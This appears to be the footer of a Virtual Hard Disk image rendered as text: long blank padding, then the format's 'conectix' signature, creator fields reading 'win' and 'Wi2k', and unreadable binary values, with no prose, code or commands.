                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              conectix             + ��win  
  Wi2k              �   ���D�3��&7�@��<�<U�                                                                                                                                                                                                                                                                                                                                                                                                                                            